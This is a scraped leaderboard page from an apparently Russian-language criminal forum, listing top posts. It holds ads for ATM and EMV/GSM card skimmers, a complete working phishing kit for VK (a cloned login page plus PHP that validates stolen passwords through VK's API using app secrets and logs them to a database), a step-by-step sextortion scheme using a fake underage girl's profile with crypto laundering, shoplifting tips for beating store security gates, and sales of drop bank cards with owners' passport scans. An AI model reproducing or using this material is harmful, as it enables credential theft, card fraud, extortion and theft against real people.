Таблица лидеров
-
во всех областях
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 10 сентября 2025
-
Год
10 сентября 2024 - 10 сентября 2025
-
Месяц
10 августа 2025 - 10 сентября 2025
-
Неделя
3 сентября 2025 - 10 сентября 2025
-
Сегодня
10 сентября 2025
-
Пользовательская дата
05.02.2022 - 05.02.2022
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 05.02.2022 во всех областях
-
14 баллов
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
Ncr, Wincor Nixdor, Diebold Insert Skimmer.Полный комплект готов к работе. Батарея может работать до 48 часов,наружная температура не влияет на время работы скиммера, так как скиммер находится внутри банкомата.Храните до 15000 дорожек кредитных карт. Полный комплект включает в себя инструменты для вставки и удаления, кабель для передачи данных,компакт-диск с программным обеспечением, это продукт plug and play, который готов к работе. Доступен для заказа PIN-пад в качестве дополнительной опции.1,000.00 USD
-
13 баллов
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
СКИММЕР-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ПЕРЕХВАТЫВАЕТ СООБЩЕНИЯ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ЗАПИШЕТ ИНФОРМАЦИЮ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. СКИММЕР EMV-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS ДЛЯ ПЕРЕХВАТА СВЯЗИ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS И ЗАПИСИ ИНФОРМАЦИИ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. Скиммер Emv-это устройство, которое помещается внутри банкомата или POS для перехвата сообщений и записи кредитной карты между чиповой картой и считывателем чипов из банкомата или POS, таким образом, вся информация о кредитной карте похищается. У вас будет быстрый и простой трек 1, трек 2 и PIN-код со всех кредитных карт, которые используют эти банкоматы или POS. Вы можете загрузить информацию с скиммера Emv, подключив телефон или ноутбук по Bluetooth к скиммеру Emv. Такое устройство СКИММЕРА EMV может не только считывать данные владельца карты с чипа, но и перехватывать PIN-код. УСТРОЙСТВО СКИММЕРА EMV создает копию исходной карты, включая все стандартные проверки подлинности SDA-Статическая проверка подлинности данных, DDA - Динамическая проверка подлинности данных, CDA-Комбинированная проверка подлинности данных. С помощью нашего устройства EMV Скиммер вы можете очень легко получить всю информацию о кредитной карте из любого банкомата или POS. С помощью устройства СКИММЕРА EMV вы можете получить трек 1 + 2 + Pin.1,600.00 USD
-
8 баллов
-
7 баллов
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
ДОСТУПНА НОВАЯ ВЕРСИЯ – НОВЫЙ ИНТЕРФЕЙС, ПОВЫШЕННАЯ АНТЕННА, МОДЕЛЬ V22.3.4 LTE2017-модель 2018 года. Скимминг банкоматов без какого-либо физического контакта. Этот скиммер будет работать без физического подключения к банкомату/POS-машине. Этот продукт является нашим бестселлером и является самым популярным устройством для скимминга кредитных карт во всем мире. Это GSM-перехватчик – скиммер. Он получает данные кредитных карт из банкоматов и POS-терминалов. Небольшой размер 5×4 сантиметра, длина антенны 17 сантиметров. С одной зарядкой он может работать до 8 часов, а изготовленная память может захватывать около 100000 данных кредитных карт, с антенной он может принимать данные в радиусе 50 метров. Устройство может работать от (-25 до +45 градусов). Мы используем батареи 3,7 В 2500 мАч. При одной зарядке устройство может работать до 8-10 часов. Он имеет встроенную память 32 Гб, он может хранить до 100000 данных кредитной карты с pin-кодами. Кратко – Приемник данных GSM-это приемник GSM-модуля, который с помощью специального программного обеспечения клонирует и получает всю информацию о кредитных картах из банкоматов и POS-терминалов. Полученная информация хранится на вашем телефоне или ноутбуке. Чтобы собрать эту информацию, вам просто нужно подключить устройство к компьютеру или мобильному устройству, и устройство отправит данные на ваш компьютер, с помощью программного обеспечения V22.3.4. GSM-приемник также реализовал новую функцию, возможность добавления банка питания для увеличения срока службы скимминга. GSM – приемник данных небольшой, и вы можете легко спрятать его в сумке, одежде, кармане или в автомобиле-рядом с терминалом POS/ATM. Устройство имеет два светодиода – красный и зеленый Красный – Устройство должно заряжаться. Мигающий красный – Устройство может работать еще 30-40 минут, после чего его необходимо зарядить или добавить блок питания или зарядное устройство usb. Зеленый+Красный – Устройство работает. Мигает зеленым – устройство подключается. Цена за GSM перехватчика $1200 USD с доставкой включена. Цена GSM перехватчика + энкодер MSR и 100 пустых пустых карт $1415USD с доставкой включена.1,200.00 USD
-
1 балл
-
1 баллВ этой теме я покажу скрипт авторизации по логину и паролю с дальнейшей проверкой на валид (без уведомлений). Предположим, у вас есть сайт под фишинг и все что вам нужно это сам механизм фишинга. Суть механизма заключается в том, что мы будем отправлять данные из HTML-форм на сервера вконтакте. В ответ мы получим access token. Делать мы это будем с помощью cUrl и прямой авторизации через API VK. Выполнять авторизацию будем, представляясь официальным приложением. Запрос на прямую авторизацию выглядит примерно так: https://api.vk.com/oauth/token?grant_type=password&client_id=[наше значение]&scope=[наше значение]&client_secret=[наше значение]&username=[наше значение]&password=[наше значение] Что все это значит: clenit_id - это id нашего приложения. Запишем в client_id значение 2274003. scope - права доступа, необходимые приложению. Усложнять себе жизнь мы не будем, а просто запросим офлайн токен, записав в scope значение "offline". Этого будет достаточно, чтобы входить на страницу ВК по токену через apidog.ru. !Важно: такой токен "живет" до тех пор, пока пользователь не сменит пароль, либо завершит все сессии в настройках безопасности. client_secret - секретный ключ Вашего приложения. Будет равен hHbZxrka2uZ6jB1inYsH username - логин пользователя ВКонтакте password - пароль пользователя ВКонтакте Варианты официальных clenit_id и client_secret Android: client_id: 2274003 client_secret: hHbZxrka2uZ6jB1inYsH IPhone: client_id: 3140623 client_secret: VeWdmVclDCtn6ihuP1nt IPad: client_id: 3682744 client_secret: mY6CDUswIVdJLCD3j15n Windows desktop: client_id: 3697615 client_secret: AlVXZFMUqyrnABp8ncuU Windows phone: client_id: 3502557 client_secret: PEObAuQi6KloPM4T30DV Теперь необходима форма авторизации как в вк. Создадим php документ authorize.php <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <?php $errorGet = $_GET['error_login']; if (!$errorGet) { echo "<style> #hide_row_pass {display: none;} </style>"; } else { echo "<style> #hide_row_pass {display: block;} </style>"; } ?> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <title>ВКонтакте | Вход</title> <link rel="stylesheet" type="text/css" href="css/al/common.css?34795707965" /><link rel="stylesheet" type="text/css" href="css/al/fonts_cnt.css?5181750877" /> <link type="text/css" rel="stylesheet" href="css/api/oauth_popup.css?29651175773"></link> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="images/icons/favicons/fav_logo_2x.ico?8"></link> </head> <body class="VK oauth_centered"> <script> if (window.devicePixelRatio >= 2) document.body.className += ' is_2x'; </script> <div class="oauth_wrap"> <div class="oauth_wrap_inner"> <div class="oauth_wrap_content" id="oauth_wrap_content"> <div class="oauth_head"> <a class="oauth_logo fl_l" href="https://vk.com" target="_blank"></a> <div id="oauth_head_info" class="oauth_head_info fl_r"> <a class="oauth_reg_link" href="https://vk.com/join?reg=1" target="_blank">Регистрация</a> </div> </div> <div class="oauth_content box_body clear_fix"> <div class="box_msg_gray box_msg_padded">Для продолжения Вам необходимо войти <b>ВКонтакте</b>.</div> <form method="POST" id="login_submit" action="login.php"> <div class="oauth_form"> <div id="hide_row_pass" class="box_error">Указан неверный логин или пароль.</div> <div class="oauth_form_login"> <div class="oauth_form_header">Телефон или email</div> <input type="text" class="oauth_form_input dark" name="login" value=""> <div class="oauth_form_header">Пароль</div> <input type="password" class="oauth_form_input dark" name="password" /> <button class="flat_button oauth_button button_wide" id="install_allow" type="submit" name="submit_login">Войти</button> <a class="oauth_forgot" href="https://vk.com/restore" target="_blank">Забыли пароль?</a> </div> </div> </form> </div> </div> </div> </div> </body> </html> Архив со всеми стилями и картинками: https://yadi.sk/d/oVB9HuhdIi_3Rw VT: https://www.virustotal.com/#/url-analysis/u-ed0fa25a82001fa36b9c7db58ac426bc1699f63284192c5f8f28239e0aa42408-1539339204 Теперь нужен файл, который будет отсылать логин и пароль на авторизацию и получение токена. Назовем login.php Но перед этим создадим БД куда будем записывать все валидные данные. 1. Переходим на хостинге в PhpMyAdmin и нажимаем "Создать" 2. Создадим таблицу на 7 столбов: 3. Параметры id, Логин (login), Пароль (password), Токен (token), Дата (date), Имя(first_name) и Фамилия(last_name) зададим как на картинке В параметрах столбца id должен быть отмечен параметр "A_I" (auto_increment) и стоять PRIMARY KEY. Теперь сам файл login.php <?php //Создадим headers $headers = array( 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'content-type' => 'application/x-www-form-urlencoded', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36' ); //Запишем сюда значения логина и пароля из HTML формы $login = $_POST['login']; $password = $_POST['password']; //Если какое-то поле оказалось пустым if (empty($login) or empty($password)) { //Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке header('Location: /authorize.php?error_login=true'); exit; } else { //Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше $get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array( 'headers' => array( 'accept: '.$headers['accept'], 'content-type: '.$headers['content-type'], 'user-agent: '.$headers['user-agent'] ) )); //Если авторизация прошла успешно if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token)) { $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true); $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true); //Записываем в переменную текущую дату и время сервера $date_l = date("H:i:s d-m-Y"); //Подключаемся к БД $host="localhost"; $user=""; //Имя пользователя от MySql $pass=""; //Пароль от MySql $db_name=""; //Имя базы $link=mysql_connect($host,$user,$pass); mysql_select_db($db_name,$link); mysql_query("set names utf8"); //Выполняем запись валида в БД $sql = mysql_query("INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')"); //Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт if ($sql) { session_start(); $_SESSION['logged_user'] = $data['response'][0]['first_name']; header('Location: vk.com/'); //Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке } else header('Location: /authorize.php?error_login=true'); //Закрываем соединение mysql_close($link); exit; } //Если авторизация не прошла, то отправим пользователя на стартовую страницу с ошибкой else header('Location: /authorize.php?error_login=true'); } //cUrl POST function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); if(isset($params['params'])) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']); } if(isset($params['headers'])) { curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']); } if(isset($params['cookies'])) { curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']); } if($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); if($proxy_userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd); } } $result = curl_exec($ch); $result_explode = explode("\r\n\r\n", $result); $headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : ''); $content = $result_explode[count($result_explode) - 1]; preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies); $cookies = implode(';', $parse_cookies[1]); curl_close($ch); return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content); } ?> В переменные $host="localhost"; $user=""; //Имя пользователя от MySql $pass=""; //Пароль от MySql $db_name=""; //Имя базы вписываем наши данные На 50 строчке если авторизация прошла успешно, нужно перенаправить пользователя на ваш сайт или куда вам угодно. header('Location: "Ваш сайт" '); Осталось залить все файлы на хостинг и можно фишить.
-
1 балл
-
1 баллБЫстрее бы новый эпл вотч вышел , очень хочу уже его купить !
-
1 балл
-
1 баллПсихологические уловки - один из главных друзей любого манимейкера. Без этого пробиться к денежным вершинам практически нереально
-
1 балл
-
1 баллЧто должно присутствовать в джентельменском наборе современного Остапа Бендера
-
1 баллЧто то слабо верится Но наверное сначало нужно попробовать , а потом говорить
-
1 баллинструменты добычи максимума информации о человеке в открытых источниках сети, не хуже олдскульного «пробить по телефону»
-
1 балл
-
1 баллДобрый день! Осуществляем производство и продажу скиммеров для банкоматов На банкоматы марок NCR, Wincor, Diebold при обращение всегда иметь фото конкретного банкомата. Ни каких кустарных технологий все пластиковые части делаются на 3d принтере MakerBot ( точность до миллиметра) Начинка полностью собственного производства, сами паяем и собираем. Стандартные характеристики: Время работы до 50 часов +-2 часа. электроника (кишки\начинка) - FLASH (msrv009\010) или AUDIO (custom\edic a16), на выбор клиента (цена не меняется) экранирование как от посторонних шумов, так и от направленного ЭМИ в области картоприемника джиттер на картоприемниках - теперь не помеха для аудио кишков простая установка, занимает не более 5 секунд для любой модели. цена: 1000$ (при обращение всегда иметь фото) контакты: jabber: skimmer@blackjabber.cc telegram: @masterskimmer
-
1 баллИзвестно ли Вам, что оборот нелегального рынка наркотиков составляет два с половиной триллиона долларов? А ведь это действительно так… Здесь оборачиваются даже не миллиарды, а триллионы долларов. Конечно, первое о чём Вы думаете это, что продажа наркотиков незаконна. И, безусловно, Вы правы, однако это вовсе не значит, что Вы не можете научиться кое-чему у этой индустрии. Ведь, согласитесь, такой успех вовсе не случаен. Вот 7 правил успеха, которые Вы можете позаимствовать у торговца наркотиками: Боритесь за качество Вы думаете, торговцы наркотиками ведут борьбу только за рынки сбыта? Вовсе нет, они конкурируют друг с другом за наилучшее качество продукта. Они знают, что успех напрямую зависит от качества предлагаемого продукта. Если Вы добьетесь идеального качества вашего продукта, то его реализация потребует гораздо меньше сил. Чем бы Вы ни занимались, всегда помните – качество должно быть одним из приоритетных направлений вышей деятельности. Старайтесь и создавайте только самые лучшие продукты на рынке, и тогда покупатель выберет именно ваш товар. Если же качество создаваемых вами изделий будет посредственным, люди, вероятно, попробуют их однажды, но тот час же откажутся от них в пользу более качественных. «Сарафанное радио» – наилучшая форма рекламы Приходилось ли Вам когда – либо видеть предложение товаров драг дилеров через рекламные щиты, журналы, или телевидение? Конечно же нет… И это конечно же не потому, что они не стремятся к реализации своего товара… Напротив, они знают, что лучшая реклама – высказанная вслух, маркетинг из уст в уста, так называемое, «сарафанное радио». Итак, если ваш продукт действительно очень хорош, клиенты будут повсеместно хвалить его, а также – предлагать попробовать потенциальным клиентам. Продавцы наркотиков, как ни кто другой, знают, что заставить клиента говорить о своём товаре всем вокруг – наилучшая форма рекламы. Как владелец бизнеса Вы, конечно же, предполагаете вкладывать средства в рекламу… и, безусловно, делать это необходимо. Но не стоит забывать о том, что производимый Вами продукт, сам по себе должен являться рекламой. Ибо ни что не превзойдёт силу слов сказанных благодарным клиентом! Предложение пробного продукта бесплатно – очень эффективный маркетинговый ход Вы всерьёз полагаете, что данный вид маркетинга изобрели продавцы программного обеспечения? Наркоторговцы делали это ещё задолго до появления интернета. Они любят предлагать людям попробовать немного бесплатно, так как знают, что они захотят ещё. Они даже могут предложить бесплатный товар ещё раз, так как уж после этого клиент станет зависимым наверняка. После этого он станет постоянным и надёжным источником денег для наркоторговца. Итак, если Вы хотите расширить клиентскую базу, начните предлагать часть товара бесплатно. Привыкнув к хорошему товару, покупатели станут вашими постоянными клиентами. Лучше быть мозгом компании, чем её лицом Чего бы Вам хотелось больше, выполнять тяжёлую работу, или руководить людьми? Умные драг дилеры не продают наркотики на улице, вместо этого они планируют бизнес. Они решают, каким образом заполучить товар, кто займётся его распространением, и наконец, они берут на себя подсчёт выручки. Они хорошо знают, что работая на улице, их шансы попасть в тюрьму возрастают многократно. Вместо этого они находятся на почтительном расстоянии от дилеров и следят за ростом своего благосостояния. Если Вы решили быть богатым, то у Вас просто нет времени на примитивную деятельность. Вместо этого вы должны сосредоточиться на распределении обязанностей и контроле над их исполнением. Всегда есть возможность нанять людей для выполнения примитивной деятельности, ваша же задача – сосредоточиться на более серьёзных вопросах. Гораздо сложнее научить кого–либо своей стратегии ведения бизнеса, чем простому выполнению работы. Всегда есть возможность увеличения продаж Вы замечали, насколько активно драг дилеры предлагают свои услуги? Они всегда пытаются изобрести всё новые и новые способы извлечения денег из клиента. Они или предлагают Вам новый товар или товар нового качества, так или иначе они всегда продают. Как и драг-дилер, Вы не должны оставлять свои попытки продать больше. Даже ваши постоянные клиенты всегда могут начать покупать у Вас больше. Ваша прибыль наверняка возрастет, когда Вы узнаете, каких инноваций хотелось бы вашим клиентам. Или же, вполне вероятно, что у клиентов есть какие-либо проблемы, которые Вы способны помочь им решить за разумную плату. Так или иначе, ни когда не прекращайте попыток увеличить продажи, таки образом Вы значительно увеличиваете доход. Контроль уровня предложения для повышения цен Что происходит на рынке, если продавцов наркотиков становится больше чем покупателей? Безусловно, цены упадут. Чтобы цена на предлагаемый Вами продукт находилась на приемлемом уровне, объём предложения аналогичных товаров должен быть под контролем. Драг дилеры всегда поступают таким образом, обслуживая наркоманов, так как от того на сколько велико предложение товара зависит его цена. Регулируя предложение, торговцы диктуют необходимый им уровень цен. Вы можете поступать аналогичным образом, занимаясь своим бизнесом. Например, когда Gmail (электронная почта от Google) только появилась на рынке интернет услуг, она не была доступна для каждого пользователя сети. Они лимитировали доступ к своей услуге таким образом, что люди продавали возможность пользоваться Gmail на eBay за пятьдесят долларов. Это совсем неплохо, для в принципе бесплатной услуги. Гораздо проще сохранять стабильное количество благодарных клиентов, чем искать новых Независимо от характера вашего текущего бизнеса, приобрести новых клиентов всегда проблематично. В наркоторговле происходит тоже самое, поэтому они всячески стремятся сохранить уже имеющуюся клиентскую базу. Порой они предлагают бесплатный товар, порой бесплатные приспособления для инъекций в качестве бесплатного бонуса. Так или иначе, он идут на всё, чтобы осчастливить своих постоянных клиентов. Итак, помимо борьбы за новых клиентов, Вы должны вести постоянную борьбу за максимальное удовлетворение уже имеющихся. Если очевидно, что ваши клиенты уходят к другим поставщикам, выясните, в чём причина и устраните её, прежде чем пытаться приобрести новую клиентскую базу. Таким образом, мы видим, что постоянная цель вашего бизнеса должна быть заключена в заботе о постоянном росте потребностей ваших клиентов и их удовлетворении. Вывод Надеюсь, данная статья не вызвала у Вас желание стать драг дилером, так как помимо того, что это очень прибыльный бизнес, он ещё и является незаконным. Вместо этого, данная статья призвана подсказать Вам пути для улучшения вашего легального бизнеса. От бесплатного предложения пробного товара, до технологии значительного увеличения продаж, здесь были предложены высокоэффективные пути для развития бизнеса. Вероятно, Вам известны какие-либо ещё интересные способы ведения бизнеса драг дилерами?
-
1 баллКороткое описание схемы Создаем в Вконтаке страницу, молодой девушки которой меньше 18 лет. Пишем в группы Знакомств, что ищите парня для общения. Вам начинают писать сотни людей, стараетесь найти тех кто хочет обменятся фото. Обрабатываете его что бы скинул сперва свою обычную фотку, и потом интим так же с лицом. Ищите через сервис поиска лиц, находите настоящую страницу, пишите на нее, свой текст шантажа. И требуете что бы он подарили вам деньги. ПРОФИТ! Подробное описание схемы! 1. Создание страницы в Вконтакте - Идем на сервис SMS-REG (не реклама) и регаем аккаунт ВК - Заполняем профиль нашей девушки, я лично брал фотки где не видно отчетливо лицо, или с боку, или только фигуру. Заполняем информацию, просто заходим к рандомной девушке и копируем все. - Вступаем группы, так же заходим к рандомной девушке и вступаем в те же группы что и она. - Добавляемся в друзья, к людям с одного города и почти одного возраста. - Станица у нас новая, это сразу палится, я лично на стене написал что старую страницу заблокировали (или взломали, взорвали, убили, распяли и т.д) 2. Ищем группы где сидят наши потенциальные жертвы. Такие группы как "Знакомства подростков 14+" , "Знакомства 12 13 14 15 16 17 18+" и тому подобные. 3. Создаем пост "Познакомлюсь с парнем для общения ( здесь дайте волю фантазии ), пишет скромно без пошлости. Не забываем про фото. 4. Ждем пока нам начнут писать жертвы. Параллельно заполняем нашу стену репостами, фоточки обновляем, делаем вид живой страницы! 5. Тут на вас обрушивается куча сообщений! Не нужно торопиться и отвечать всем, старайтесь брать столько людей, что бы вы могли всем отвечать без больших пауз. 6. Отсеиваем школьников. Диалог с жертвой! Как же развести их на фото, во первых не нужно сразу писать" кидай интим фото с лицом", Делаем все постепенно, сперва обычное общение "скок лет?" "чем занимаешься?" просишь просто скинуть обычную фотку ( они чаще кидают фотку которая есть у них на основной странице в ВК ) и т.д. После спокойного общения у вас 2 пути! 1 - Жертва сама просит вас скинуть ваше фото, кидаете обычное фото которое нету на странице. 100% он скажет что не обычное, а интим давай. Тут я говорил что я не такая и все дела, что меня уже разводили на фото, и т.д. Дальше говорил что давай ты первый скинь фото но ток с лицом ( да прям на прямую пишите так ) Вероятность 50 на 50, кинет или нет. Так лучше чем ходить вокруг да около. Если кинул фотку ОТЛИЧНО! Если НЕТ то блокируем его, не тратим время на таких. Сохраняем всю переписку ОБЯЗАТЕЛЬНО! 2 - Жертва тормозит и не просит фото, так не стесняясь просите его фото! Он кидает конечно без лица. И вы в ответ кидаете рандомную девушку без лица. Он попросит фоточку с лицом и тут делаем все так же как и в первом случаи. Не тратьте время на долгие разговоры, потратите ток свое время и нервы! Таких много, каждый день вам будут писать по сто новых извращенцев. Нервы и время нужно тратить на шантаж! Шантаж Здесь вам нужно потрудится. - Заходим на сервис FindFace - Ищем нашу жертву по фото которое он скинул нам. Не интим! А обычное фото! 70% вероятностью вы спокойно найдете его! - Копируем друзей, родственников! Где же взять номер? Чеще они сами просят пойти в WhatsApp. Если нет, то предлагаете сами. После того как пробили жертву начинается самое интересное! Лучше всего создать Второй аккаунт в ВК. И оформить его серьезно, сделать вид что вы занимаетесь раскрытием таких личностей. Так будет легче, так как они думают что до сих пор общаются с девчонкой. Я писал им на основную страницу в ВК. Два варианта как писать можно прям в ВК. Или используем сервис onetimesecret.com ( не реклама ) это "Сервис самоуничтожающихся сообщений", т.е. создаем сообщение все ему подробно описываем, как только он его прочтет, или по истечению времени она удаляется. Зачем? Я подумал что если не будет сообщения то и нет шантажа. Что писать? А пишем все что с ним будет если это раскроется, пишем пожестче ! ( текст писать я не буду, дайте волю фантазии ). Так же прикрепляем фотки где вы уже пишете его друзьям и родственникам! Обязательно пишем что если будут вопросы задавать, то кинете сразу брату или сестре ( если есть ) или другу. Не давайте им много времени максимум 2 часа! Так же не забываем написать что если добавит в Черный список, все разошлём! Получаем деньги Здесь так же два способа получить от них деньги. Первый способ: На Яндекс.Деньги или Qiwi. После вывести на Крипто Кошелек, и через миксеры прогонять, и уже потом на свой обычный кошелек. Второй способ: На прямую на Крипто Кошелек. Вот здесь вам надо поработать. Лично я использовал этот способ. Вам нужно подробно расписать для жертвы все действия как и что делать. Я делал через Телеграмм бота. ( если хотите узнать какого в ЛС ) Сколько требовать ? Это сами смотрите. Можно понять по странице в ВК. Главное не гните слишком.
-
1 балл
-
1 баллСамые часто задаваемые вопросы по магазинам одежды. https://t.me/shoplifting_teamJanuary 16, 2018 Шоплифтинг для новичков: 1.По России уголовная ответственность идёт с 2500 по закупочной цене. 2.Самые распространенные ворота в России это рч и ам *Рч ворота это- Радиочастотная системы охраны,работающая на частоте 8,2 мГц артинка взята с сайта @bombaster'a так выглядят рч ворота 3.Обойти ее можно сделав броник из фольги 5-7 слоев *Ам это - Акустомагнитная система охраны, обойти так же можно броником из фольги слоев 10-15, так же существуют глушилки ам ворот, стоимость из достигает 30к Картинка взята с сайта @bombaster'a так выглядят ам ворота и алармы. 4.Так же есть МД и ММД а)Мд реагирует на металл размером более А4 б)ММД реагирует на магнит, то есть ваш съёмник будет палиться это МД) 5.У большинства магазинов установлены РЧ ворота, понять можно по ракушками виде аларма. 5.Как лучше работать новичкам по шмоткам ? -Для новичков лучше работать в примерке. Брать три вещи, и одну вещь которая по середине согнуть и пройти в примерку АМ с МД установлен в "PULL&BEAR", "ZARA", "Stradivarius", "Bershka". РЧ с МД установлен в "NEW YORKER", "Adidas", "Reebok".
-
1 баллПопробовал поработать с ТС. Так для интереса, все работает как часы - конечно не швейцарские, но как хорошие русские часы. Чуть задержали по времени, дроп нервничал - но все прошло хорошо. Извини работать регулярно не смогу, своих дел много. Но человека тебе оставляю.
-
1 баллКак у тебя хватило мозга это все написать?!
-
1 баллЗабавная схема, по крайней мере денег своих стоит , работаю неделю, а уже окупил
-
1 балл
-
1 баллПредложение для безопасной и анонимной работы с финансами. Предлагаю вашему вниманию инструменты для оптиматизации вашего бизнеса и работы в интернете: дебетовые банковские карты российских банков. Доставка осуществляется по всей территории России и за её пределы. Все заказы выполняются в срок. Банковские карты и их особенности: Связной банк - суточный лимит снятия 360000руб и столько же в месяц. Моментальный приход денег, после перевода с платёжной системы киви. Мтс банк - суточный лимит снятия 600000руб и столько же в месяц. Моментальный приход денег, после перевода с платёжной системы киви. Альфа банк - Моментальный приход денег, после привязки карты и перевода с платёжной системы яндекс-деньги. моментум: суточный лимит снятия 60000руб в месяц 750000руб. голд: суточный лимит снятия 360000руб. в месяц 750000руб. Сбербанк- моментум: суточный лимит снятия 150000руб. в месяц 5000000руб классик: суточный лимит снятия 150000руб. в месяц 5000000руб голд: суточный лимит снятия 300000руб. в месяц 10000000руб Работаем так же под заказ со следующими банками: Втб24 Авангард Открыти Русский стандарт Приват Промсвязь Цены на карты: моментум: от 7000руб классик: от 10000руб голд: от 15000руб платина: от 200000руб Комплект карты включает в себя: Сама карта Сим-карта, привязанная к карте Анкета из банка(договор) Скан паспорта владельца паспорта и кодовое слово Данные для входа в интернет-банк (логин и пароль) Оплату принимаем так и наличном виде, так и в электронном киви,яндекс,вебмани, перевод на банковскую карту,телефон)
-
1 балл
-
1 балл
-
1 баллСпасибо Артем, уже много чего хорошего тебе в телеграм написал, но тут тоже надо Оооочень благодарен, выхлопы уже пошли Советую всем!!!!!
-
1 балл
-
1 баллВсем привет , подошел к концу месяц после обучения Хотелось бы высказаться Вначале подумал , что лучше бы машину починил на эти деньги Потом посидел , понавострился и теперь думаю , что надо новую машину брать
-
1 балл
-
1 баллСейчас сберы устанавливают для борьбы со взломом красители, при повреждении датчиков которого, все купюры заливаются краской. У некоторых инкасаторов так же идут такие чемоданы. Сам неоднократно видел. Но пока тока вводят. Большинство случаев конечно по старинке. Кстати на холод также реагируют, в азот поместить не получится. Испорченные купюры банк поменяет, а вот грабитель уже нет. А вот тема с нарезкой и склеиванием 5000 купюры, как из одной сделать две фальшивки, которые терминал схавает оказываться еще работает. Думал что она вымерла год назад, но тут недавно попросил чувак, у которого были финансовые проблемы, и решился на такое, за два дня поправил свое положение. Тему выкладывать не буду. Но скажу, если хорошо загуглите то найдете.
-
1 баллСерая схема заработка от 80к в месяц Нам потребуются: -вложения в размере 1-3к -Владение paint или Фотошопа -небольшое знакомство с СИ. На подготовку понадобится пару дней Тема будет жить очень долго. Стоимость схемы 200$
-
1 баллЗдравствуйте форумчане!Увидел ваш сайт в интернете,решил посмотреть и нашел многое.Заинтересовал раздел кардинг. Перечитал все,вроде понял что и как,но вот не знаю куда именно Карточку вбить.Старики форума и гуру кардинга дайте совет ,куда вбивать ее легкче и с чего начать в этом деле?
-
1 балл
-
1 баллИнтересная статья, жаль что сервис уже не работает ваш( По сути под VPN можно ведь в любой файлообменник залить архив, не так ли? и так же просить выкуп за его удаление, а бабки на дропа выводить, если что не так подправте или исправте)
-
